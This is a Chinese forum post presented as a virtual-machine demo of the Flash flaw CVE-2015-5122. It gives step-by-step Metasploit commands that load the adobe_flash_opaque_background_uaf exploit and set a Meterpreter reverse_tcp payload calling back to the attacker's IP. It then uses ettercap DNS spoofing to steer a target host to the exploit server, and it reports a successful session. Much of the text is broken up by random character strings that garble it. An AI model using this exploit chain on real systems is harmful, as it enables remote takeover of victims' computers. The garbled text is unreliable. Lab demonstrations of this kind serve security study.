找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1413|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. { B' g6 {: c" r 二、cve2015-5122漏洞实例演示虚拟机 + y, g2 t$ F/ b

# T* W w6 O6 g% k, W

( A* j4 l, [0 U" i H   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: . W1 C4 S* v/ Z7 }

% o9 f7 s+ Z+ D6 _; `

0 e P; X+ p" R4 _& Y/ k% s5 r search cve-2015-5122如图: . L" _) N U- k, N, h. B

9 l+ I p+ C% g, A8 |& z

) d L+ Z- k. t" u5 Q   " P4 ~+ Q$ [6 t. m, E

9 D3 P) j& A+ [" O: ?

8 ]- H' J" ?/ t' j6 `6 [ 下面我们敲如下命令: 3 b% s5 W& k8 Z" Z* ~6 B$ g; F+ h

$ I) @. b, x: @( p

4 {% }3 N1 ]+ ^ use exploit/multi/browser/adobe_flash_opaque_background_uaf 4 G* \: D0 I' K0 E F, M" A- Z

4 H9 ?# S% F6 t" [8 [9 ^. Y

2 ~7 b( P- A* N5 e set PAYLOAD windows/meterpreter/reverse_tcp ; v5 l, b b& Z6 }/ I! E

7 I/ _: A6 v4 L/ @0 r4 k7 V2 J) F

) w- _* B% P: m* O set LHOST 192.168.0.109 * s, m2 ~+ _# @* l* x( J* b' Q

& l- h# H# n' u" F7 s2 y8 v/ M

8 [3 y4 R4 _, O set URIPATH /                        /*根目录*/ 5 H$ h9 v; r, Z6 V6 D2 Q- ^7 P

& P. c4 L: |7 n5 R2 E

( E" x( ?1 L. Y! E set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 ) w. H9 C4 Z+ v; ^" Z% v

& @/ ~* f2 u N- x+ R/ {

0 ~0 x& f8 i2 ?; V! r( q8 ] set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 8 }, d! k, R6 c/ S0 d7 @7 ^) Q/ S0 |

- `0 ~+ A0 L3 r+ J$ D; }

! j* r6 G, x1 b- d' P! |: z% O 然后show options如图: + j" f) _9 }# b/ S

# c* O6 o+ X& C, Y+ J. e8 r

0 S/ W; j9 ~6 P/ j% ]& D- H   $ f) _' @; S+ N) \% S7 I& q

. u$ @1 K Q* K. c5 S1 ?4 |

4 k j5 o$ d! l3 P8 D3 M 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
4 S* N8 ]% f& Z% R4 E' n' v. Y
6 W' I& r' K' e( B) z9 G0 g& c

9 l' ]7 ]; b# }6 L; _

$ A6 @2 S! {0 F& W, |0 ?% `# r; k 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 3 V0 @: X' e/ `! J" \$ h

0 M6 w+ ~; w' j E" @/ S! m

7 ]% ]* C1 g+ \0 Z- p: C9 ? Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf + H- _4 q# I! X. C' U1 i* m& J N

0 m4 H& k9 Z; E8 z( N/ F

7 R4 M% C# p. D- i* Y" @   6 r& ?% f9 U" |7 ]2 _9 b! N- L

+ [% {) ?: W0 G7 J& G

' t/ U4 S: I# L+ k3 T 成功了,这时候我们断开ettercap,如图: 6 ^5 r7 t2 R' E. _7 C

6 l/ a4 e% M. ]1 R( `7 i

! L) U% |6 M. Z7 N" U   . p$ d- X. J' a2 {. k! }$ o

) ]6 X5 @2 i" S K1 c8 h8 [1 I, D) [6 e

6 o+ J# X4 Y* H0 `, i Screenshot如图: 4 r2 @. v2 H* E- l& M7 r& f! H `$ u

. _+ u3 P' e* l Q

2 j7 E3 t0 a! w f7 ^   i& v! T! K3 P% x. T

: Z ], K) X) e6 t3 B* m P

4 u% }. }; ?8 z: [$ O6 g N1 H 6 V0 ]5 Y+ e) Z3 a6 d) J

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表